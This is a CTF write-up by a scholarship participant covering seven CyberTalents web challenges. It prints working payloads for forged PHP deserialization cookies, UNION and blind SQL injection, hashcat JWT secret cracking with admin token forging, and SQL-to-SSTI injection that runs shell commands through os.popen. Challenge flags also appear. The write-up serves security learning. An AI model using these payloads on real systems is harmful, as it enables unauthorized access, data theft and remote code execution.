CYBERTALENTS SCHOLARSHIP — Web Security CTF
This writeup is written by blackninja23
I truly thanks cybertalents for their scholarship as it help me gain some knowledge and be in greater community among different people in Africa and Arab countries.I personally participate in ethical hacking scholarship and web security and it was good.I hope next time maybe i will be in incident and digital forensics but for now i am more interest in Penetration stuff.
first challenge in web security CTF
The answer to first challenge was CSRF.
Second challenge in web security CTF
To solve the challenge is that you are supposed to go to http://35.240.62.111/whereisflag/ then look at source page either by right click on browser then click View Source page or Ctrl+U
we need to decode that flag which is VGgzRmxhZzFzSDNyM0JyMA%3D%3D
Using burpsuite to decode from url then from base64 we have flag which is Th3Flag1sH3r3Br0
Third challenge in web security CTF
Go to url, give me this
So after a while, i recognize that i am dealing with headers
change from Accept-Language: en-US,en;q=0.5 to Accept-Language: de so as to speak german
flag is FLAG{HE4DERS_M4G1C}
Fourth Challenge in web security CTF
Go to url , give me this
I didn’t register to it that is why it say anonymous. How does website know?I check to cookies right away.Then i found cookie
Cookie: userCookie=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJOYW1lIjtzOjk6ImFub255bW91cyI7czo3OiJpc0FkbWluIjtiOjA7fQ%3D%3D
Decode it from url and from base64 using burpsuite and i found something interest which is php serialization technique being used. it might vulnerable to insecure deserialization.After decode it, we have this O:4:”User”:2:{s:8:”userName”;s:9:”anonymous”;s:7:”isAdmin”;b:0;}
Let understand it
O means Objects ,4 means 4 letters in word “User” , 2 means we have two attribute which are userName and isAdmin, s means strings, 8 mean 8 letters in “Username”, s means strings, 9 means 9 letters in anonymous, s means strings, 7 means 7 letters in isAdmin, b means boolean, and 0 is value of isAdmin in boolean
So it mean that we have 2 attributes which are userName and isAdmin in which value of userName is anonymous and value of isAdmin is 0.
so we need to change value and numbers of data type
O:4:”User”:2:{s:8:”userName”;s:5:”admin”;s:7:”isAdmin”;b:1;}
Value of UserName is admin and it has 5 in numbers
value of isAdmin to 1
encode it to base64 , we have Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJOYW1lIjtzOjU6ImFkbWluIjtzOjc6ImlzQWRtaW4iO2I6MTt9
flag is FLAG{REALLY!!_IN_COOKIES}
fiveth challenge in web security CTF
it deal with telegram bot called ctgrocerybot
Time to open https://web.telegram.org/ and use that bot
First i try to understand how it works and from /help, we have 3 commands which are /help or /start , /list and /price
let check /list and we have
try other like /list banana but it bring same result as above
let check /price but remember menu, it say to include <item>
let try /price banana
You can try for your own others, /price flag
Next step, where are price come from?Let us test for sql injection
Let us confirm that it is sql injection with ‘ or 1=1 — -and ‘ or 1=2 — -
As we can see we have different errors so let us go hunting for payloads
try work with ‘ or 1=1 — -
Next step: try to know numbers of columns we are interacts with
let us use ‘ or 1=1 UNION SELECT NULL — -
then increase NULL — ‘ or 1=1 UNION SELECT NULL,NULL — -
so we have on columns
Next step: what type of databases are we using?
- ‘ UNION SELECT @@version — -
2. ‘ or 1=1 UNION SELECT version() — -
3. ‘ or 1=1 UNION SELECT sqlite_version() — -
We have sqlite database as it brings 25$ but you notice something that it is blind sql injection.
Next step to confirm that it is sqlite database with ‘ or 1=1 UNION SELECT tbl_name FROM sqlite_master — -
try different one /price ‘ or 1=1 UNION SELECT tbl_nadwewefme FROM sqlite_master — -
we really having sqlite database
Next step is to know table name
Try to check for table named flags with use ‘ or 1=1 UNION SELECT NULL FROM flags LIMIT 1 — -
try ‘ or 1=1 UNION SELECT NULL FROM iamnotflags LIMIT 1 — -
In really scenario you better use substr() function
Next step is to know column name
Try to check column name called flag with use ‘ or 1=1 UNION SELECT flag FROM flags LIMIT 1 — -
CONFIRM: ‘ or 1=1 UNION SELECT iamnotflag FROM flags LIMIT 1 — -
Next step is to know the flag:
Try to use this ‘ or 1=1 UNION select flag from flags WHERE SUBSTR(flag,1,1)=’F’ — — but it fails me as every letter bring not found
So i decided to make some error to get the flag with use /price ‘ UNION select flag from flags WHERE SUBSTR(flag,1,1)=’F’ — -
try check ‘ UNION select flag from flags WHERE SUBSTR(flag,1,1)=’f’ — -
try ‘ UNION select flag from flags WHERE SUBSTR(flag,1,1)=’A’ — -
UNTIL this we know that we have F as first letter
SECOND letter:
with this /price ‘ UNION select flag from flags WHERE SUBSTR(flag,2,1)=’L’ — -
UNTIL now we have second letter ‘L’
But also you can use blind sql with condition response
/price ‘ or 1=1 UNION SELECT CASE WHEN (SUBSTR(flag,1,1)=’F’) THEN 1/0 ELSE ‘a’ END FROM flags —
continue until you get flag which is FLAG{sql_1nj3c7i0n_c4n_h4pp3n_t0_b0ts_t0o}
you can also do some scripting and that it is alot of works. That it is why it’s level is hard
sixth challenge in web security CTF
Go to url, you got error that your browser is banning the port. At first I did use curl command but now we will use browser.
To enable port 6000, watch this https://www.youtube.com/watch?v=h6JChX2D_EE&ab_channel=ecologicaltime
Go to url , we see page
we have register and login page then try to register with username=admin65 and password=admin65
let try to login and then capture some traffics with burpsuite
there is Set-Cookie which is Set-Cookie: jwtStore=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluNjUifQ.lL35vj3ExJnMZHJK9nbRT1FqT5Me8ZcarV5tenfH_YY; Path=/
but cookie value of jwtStore is jwt’type
I went to try crack it the secret. you can use jwt-secret but personally i use hashcat. Jwt token should be saved to file.Command is
hashcat -m 16500 file rockyou.txt. so i have already cracked.
Also in jwt-secret, install jwt-secret with sudonpm install --global jwt-secret then crack it with commandjwt-secret — file ./rockyou.txt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluMnEifQ.hqXWfGQwZSxjgbVYCy_ZUxxkCVKl5Eck7RfGRoVXOHQ
Now we have secret as missbritt1 .Now go to https://jwt.io/ and edit after put the secret to secret region
now we have new jwt token for admin and let us login as admin by editting cookies so new Cookie for admin is Cookie: jwtStore=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.Ze5AKe2aIu2szH31gpPdhlEhY6X3Cnf5xgVMnQqxfcg; Path=/
we have flag which is FLAG{st0p_l00k1n9_at_my_s3cret!!1!!_027f00f}
seventh and last challenge in web security CTF
go to link, give us page
Login and Register are just bring pop up message and not take us to page
We are remaining with Notes and admin notes in which are same things
click Notes, we take to
we have some notes to look.
Take a look at first we have base64, try to decode it from Q3liZXJUYWxlbnRz in base64, we have CyberTalents.
After a while of some different tests, i came across error of sql injection.
echo -n “‘“|base64 — -test to /notes/Jw== we have error but we are not sure if it is sql injectable
Let us determine number of columns — echo -n “‘ UNION SELECT NULL — -”|base64 — -test to /notes/JyBVTklPTiBTRUxFQ1QgTlVMTC0tIC0= , we have internal server error but sometime NULL may throw internal server error
let continue test that first columns — echo -n “‘ UNION SELECT ‘a’ — -”|base64 — -test to /notes/JyBVTklPTiBTRUxFQ1QgJ2EnLS0gLQ==, we have succesful write string a to browser.MORE echo -n “‘ UNION SELECT ‘YES, I AM HACKABLE BY SQL INJECTION’ — -”|base64 — -test to /notes/JyBVTklPTiBTRUxFQ1QgJ1lFUywgSSBBTSBIQUNLQUJMRSBCWSBTUUwgSU5KRUNUSU9OJy0tIC0=
Now we have sql injection, find version of database,this cheat will help https://portswigger.net/web-security/sql-injection/cheat-sheet and also https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection . i will try sqlite version with echo -n “‘ UNION SELECT sqlite_version() — -”|base64 — ->/notes/JyBVTklPTiBTRUxFQ1Qgc3FsaXRlX3ZlcnNpb24oKS0tIC0=
Now we have version of sqlite database which is 3.34.1
Enumerate for tables:
echo -n “‘ UNION SELECT tbl_name FROM sqlite_master — -”|base64 — -/notes/JyBVTklPTiBTRUxFQ1QgdGJsX25hbWUgRlJPTSBzcWxpdGVfbWFzdGVyLS0gLQ==
we have table called flags. Go for columns of flags. echo -n “‘ UNION SELECT sql FROM sqlite_master — -”|base64 — — /notes/JyBVTklPTiBTRUxFQ1Qgc3FsIEZST00gc3FsaXRlX21hc3Rlci0tIC0=
we have column called flag and table as we already know is flags
Let us extract some values then, echo -n “‘ UNION SELECT flag FROM flags — -”|base64 — — — /notes/JyBVTklPTiBTRUxFQ1QgZmxhZyBGUk9NIGZsYWdzLS0gLQ==
we have flag but look like it is first part of flag. Very funny to have first part which is FLAG{8f94cf148a9f01a3745e
After sometimes, i release this is template and flask so why don’t try Server Side Template Injection (SSTI)
Try with this echo -n “{{7*7}}”|base64 but no luck
Here an idea come how about SSTI in SQL. I know it is crazy too. If it accept then it is reflect from database
Let us begin with echo -n “‘ UNION SELECT ‘{{7*7}}’ — -”|base64 — — -/notes/JyBVTklPTiBTRUxFQ1QgJ3t7Nyo3fX0nLS0gLQ== if it will multiply 7*7==49
Then we have SSTI, continue to command injection
Try execute ls
echo -n “‘ UNION SELECT ‘{{config.__class__.__init__.__globals__[\”os\”].popen(\”ls\”).read()}}’ — -”|base64 — — — —/notes/JyBVTklPTiBTRUxFQ1QgJ3t7Y29uZmlnLl9fY2xhc3NfXy5fX2luaXRfXy5fX2dsb2JhbHNfX1sib3MiXS5wb3BlbigibHMiKS5yZWFkKCl9fSctLSAt
we need to cat flag2.txt
echo -n “‘ UNION SELECT ‘{{config.__class__.__init__.__globals__[\”os\”].popen(\”cat flag2.txt\”).read()}}’ — -”|base64 — — — — — /notes/JyBVTklPTiBTRUxFQ1QgJ3t7Y29uZmlnLl9fY2xhc3NfXy5fX2luaXRfXy5fX2dsb2JhbHNfX1sib3MiXS5wb3BlbigiY2F0IGZsYWcyLnR4dCIpLnJlYWQoKX19Jy0tIC0=
we have second part of flag which is 12f1fc6f8e419dc0fb08}
so the flag is FLAG{8f94cf148a9f01a3745e12f1fc6f8e419dc0fb08}
I finish those six challenges
